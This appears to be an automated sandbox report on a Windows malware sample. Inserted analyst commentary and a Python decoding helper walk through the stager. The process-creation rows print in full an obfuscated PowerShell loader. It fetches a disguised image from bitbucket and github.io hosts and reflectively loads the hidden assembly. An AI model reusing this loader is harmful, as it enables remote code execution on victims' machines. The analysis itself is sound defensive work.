y@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq
@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@c
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.drbfojs/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'vbc', '0'))}}" .exe -windowstyle hidden -exec
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$dosigo = 'wwbo@gu@d@@u@fm@zqby@hy@aqbj@gu@u@bv@gk@bgb0@e0@yqbu@ge@zwbl@hi@xq@6@do@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@@g@d0@i@bb@e4@zqb0@c4@uwbl@gm@dqby@gk@d@b5@f@@cgbv@hq@bwbj@g8@b@bu@hk@c@bl@f0@og@6@fq@b@bz@de@mg@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgb1@g4@ywb0@gk@bwbu@c@@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@rgby@g8@bqbm@gk@bgbr@hm@i@b7@c@@c@bh@hi@yqbt@c@@k@bb@hm@d@by@gk@bgbn@fs@xqbd@cq@b@bp@g4@awbz@ck@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@b3@gu@ygbd@gw@aqbl@g4@d@@g@d0@i@bo@gu@dw@t@e8@ygbq@gu@ywb0@c@@uwb5@hm@d@bl@g0@lgbo@gu@d@@u@fc@zqbi@em@b@bp@gu@bgb0@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@c@@pq@g@ec@zqb0@c0@ugbh@g4@z@bv@g0@i@@t@ek@bgbw@hu@d@bp@gi@agbl@gm@d@@g@cq@b@bp@g4@awbz@c@@lqbd@g8@dqbu@hq@i@@k@gw@aqbu@gs@cw@u@ew@zqbu@gc@d@bo@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@zgbv@hi@zqbh@gm@a@@g@cg@j@bs@gk@bgbr@c@@aqbu@c@@j@bz@gg@dqbm@gy@b@bl@gq@t@bp@g4@awbz@ck@i@b7@c@@d@by@hk@i@b7@c@@cgbl@hq@dqby@g4@i@@k@hc@zqbi@em@b@bp@gu@bgb0@c4@r@bv@hc@bgbs@g8@yqbk@eq@yqb0@ge@k@@k@gw@aqbu@gs@kq@g@h0@i@bj@ge@d@bj@gg@i@b7@c@@ywbv@g4@d@bp@g4@dqbl@c@@fq@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@by@gu@d@b1@hi@bg@g@cq@bgb1@gw@b@@g@h0@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gw@aqbu@gs@cw@g@d0@i@b@@cg@jwbo@hq@d@bw@hm@og@v@c8@ygbp@hq@ygb1@gm@awbl@hq@lgbv@hi@zw@v@gm@ywbj@gm@ywbj@gm@ywbj@gm@ywbj@g4@bqbm@gc@lwbn@hy@z@bm@gg@z@@v@gq@bwb3@g4@b@bv@ge@z@bz@c8@d@bl@hm@d@@u@go@c@bn@d8@mq@z@dc@mq@x@dm@jw@s@c@@jwbo@hq@d@bw@hm@og@v@c8@bwbm@gk@ywbl@dm@ng@1@c4@zwbp@hq@a@b1@gi@lgbp@g8@lw@x@c8@d@bl@hm@d@@u@go@c@bn@cc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@cq@aqbt@ge@zwbl@ei@eqb0@gu@cw@g@d0@i@be@g8@dwbu@gw@bwbh@gq@r@bh@hq@yqbg@hi@bwbt@ew@aqbu@gs@cw@g@cq@b@bp@g4@awbz@ds@dq@k@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@aqbm@c@@k@@k@gk@bqbh@gc@zqbc@hk@d@bl@hm@i@@t@g4@zq
@g@cq@bgb1@gw@b@@p@c@@ew@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@i@@9@c@@wwbt@hk@cwb0@gu@bq@u@fq@zqb4@hq@lgbf@g4@ywbv@gq@aqbu@gc@xq@6@do@vqbu@ey@o@@u@ec@zqb0@fm@d@by@gk@bgbn@cg@j@bp@g0@yqbn@gu@qgb5@hq@zqbz@ck@ow@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c@@pq@g@cc@p@@8@ei@qqbt@eu@ng@0@f8@uwbu@ee@ugbu@d4@pg@n@ds@i@@k@gu@bgbk@ey@b@bh@gc@i@@9@c@@jw@8@dw@qgbb@fm@rq@2@dq@xwbf@e4@r@@+@d4@jw@7@c@@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@pq@g@cq@aqbt@ge@zwbl@fq@zqb4@hq@lgbj@g4@z@bl@hg@twbm@cg@j@bz@hq@yqby@hq@rgbs@ge@zw@p@ds@i@@n@@o@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@j@bl@g4@z@bj@g4@z@bl@hg@i@@9@c@@j@bp@g0@yqbn@gu@v@bl@hg@d@@u@ek@bgbk@gu@e@bp@gy@k@@k@gu@bgbk@ey@b@bh@gc@kq@7@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@g@gk@zg@g@cg@j@bz@hq@yqby@hq@sqbu@gq@zqb4@c@@lqbn@gu@i@@w@c@@lqbh@g4@z@@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lqbn@hq@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@kq@g@hs@i@@k@hm@d@bh@hi@d@bj@g4@z@bl@hg@i@@r@d0@i@@k@hm@d@bh@hi@d@bg@gw@yqbn@c4@t@bl@g4@zwb0@gg@ow@g@@0@cg@g@c@@i@@g@c@@i@@g@c@@i@@g@c@@i@@k@gi@yqbz@gu@ng@0@ew@zqbu@gc@d@bo@c@@pq@g@cq@zqbu@gq@sqbu@gq@zqb4@c@@lq@g@cJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12 function downloaddatafromlinks { param ([string[]]$links) $webclient = new-object system.net.webclient; $shuffledlinks = get-random -inputobject $links -count $links.length; foreach ($link in $shuffledlinks) { try { return $webclient.downloaddata($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imagebytes = downloaddatafromlinks $links; if ($imagebytes -ne $null) { $imagetext = [system.text.encoding]::utf8.getstring($imagebytes); $startflag = '<<base64_start>>'; $endflag = '<<base64_end>>'; $startindex = $imagetext.indexof($startflag); $endindex = $imagetext.indexof($endflag); if ($startindex -ge 0 -and $endindex -gt $startindex) { $startindex += $startflag.length; $base64length = $endindex - $startindex; $base64command = $imagetext.substring($startindex, $base64length); $encodedtext =[convert]::tobase64string($bytes); $commandbytes = [system.convert]::frombase64string($base64command); $text = $encodedtext; $loadedassembly = [system.reflection.assembly]::load($commandbytes); $encodedtext =[convert]::tobase64string($bytes); $compressedbytearray = get-compressedbytearray -bytearray $enctext $type = $loadedassembly.gettype('testpowershell.hoaaaaaasdme'); $encodedtext =[convert]::tobase64string($bytes); $method = $type.getmethod('lfsgeddddddda').invoke($null, [object[]] (' txt.drbfojs/selif_cilbup/46.622.06.26//:', '0', 'startupname', 'vbc', '0'))}}" .exe -windowstyle hidden -execJump to behavior
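The process-creation rows above expose the whole stager in two layers. The wscript.exe child receives `$dosigo`, a base64 string in which every `A` has been swapped for `@` (the first 72 characters decode to `[Net.ServicePointManager]::`, which is exactly how the plaintext command in the next row begins, so the wrapper is base64 of UTF-16LE text, the encoding PowerShell uses for encoded commands). The plaintext stage shuffles two URLs, downloads a "test.jpg", carves whatever sits between `<<BASE64_START>>` and `<<BASE64_END>>`, hands the decoded bytes to `[System.Reflection.Assembly]::Load`, and invokes `testpowershell.Hoaaaaaasdme.lfsgeddddddda` with a reversed first argument. The statements that reference `$Bytes`, `$encText` and `Get-CompressedByteArray`, none of which the command defines, never feed the load-and-invoke path and can be treated as noise. The script below is an added triage helper, not code from the report or from the malware: it reproduces each of those three transformations so an analyst can apply them to a captured `$dosigo` blob, a fetched image, or the printed Invoke arguments. The "image" it parses is a constructed stand-in (a fake DOS header inside JPEG-looking bytes, not a real assembly), and the reversed argument yields `://62.60.226.64/public_files/Sjofbrd.txt` with no scheme; what the loaded assembly prefixes to it is not shown in this report, so the script does not guess.

```python
import base64
import re
from typing import Optional

START, END = b"<<BASE64_START>>", b"<<BASE64_END>>"

# First 72 characters of $dosigo as printed in the report (decodes to a complete prefix).
DOSIGO_PREFIX = "WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@"

# The Invoke call exactly as printed in the plaintext stage above.
PRINTED_INVOKE = ("$method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] "
                  "(' txt.drbfojS/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'Vbc', '0'))")

# Constructed stand-in for the fetched test.jpg: JPEG-looking bytes around the
# marker-delimited base64 of a tiny fake DOS header (not a real assembly).
FAKE_IMAGE = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32
              + START + base64.b64encode(b"MZ\x90\x00" + b"\x00" * 60) + END
              + b"\xff\xd9")


def decode_dosigo(blob: str) -> str:
    """Undo the first-stage wrapper: '@' stands in for the base64 letter 'A' (which
    breaks naive base64 carving), and the decoded bytes are UTF-16LE. An incomplete
    trailing group, like the truncated tail printed in the report, is dropped, not guessed."""
    b64 = blob.replace("@", "A")
    b64 = b64[: len(b64) - len(b64) % 4]
    return base64.b64decode(b64).decode("utf-16-le", errors="ignore")


def carve_payload(blob: bytes) -> Optional[bytes]:
    """Replicate the second stage's marker search on the fetched 'image': the bytes between
    <<BASE64_START>> and <<BASE64_END>> are the base64 of the assembly that is passed to
    [System.Reflection.Assembly]::Load. Returns None when either marker is missing, which
    mirrors the stage's own `if ($startIndex -ge 0 -and $endIndex -gt $startIndex)` guard."""
    s = blob.find(START)
    if s < 0:
        return None
    s += len(START)
    e = blob.find(END, s)
    if e < 0:
        return None
    return base64.b64decode(blob[s:e])


def unreverse(arg: str) -> str:
    """The first Invoke argument is stored backwards; flip it to read the fetch location."""
    return arg[::-1].strip()


def invoke_args_from_command(cmd: str) -> list:
    """Pull the positional arguments out of the printed `.Invoke($null, [object[]] (...))`."""
    m = re.search(r"\.Invoke\(\$null, \[object\[\]\] \((.*?)\)\)", cmd)
    if not m:
        return []
    return [a.strip().strip("'") for a in m.group(1).split(",")]


def triage() -> dict:
    """Run all three transformations over the embedded samples and collect the indicators."""
    args = invoke_args_from_command(PRINTED_INVOKE)
    payload = carve_payload(FAKE_IMAGE)
    return {
        "dosigo_prefix_plaintext": decode_dosigo(DOSIGO_PREFIX),
        "carved_payload_magic": payload[:2] if payload else None,
        "fetch_location": unreverse(args[0]) if args else None,
        "remaining_invoke_args": args[1:],
    }


if __name__ == "__main__":
    for k, v in triage().items():
        print(f"{k:26} {v!r}")
```

The remaining Invoke arguments as printed are `'0', 'StartupName', 'Vbc', '0'`; `Vbc` matches the name of the binary the hollowed vbc.exe later starts from `AppData\Roaming\XenoManager`, which is as far as this report lets one go without the loaded assembly itself.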
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.25140.8272.exeCode function: 0_2_00007FF6A1D812EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_00007FF6A1D812EC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
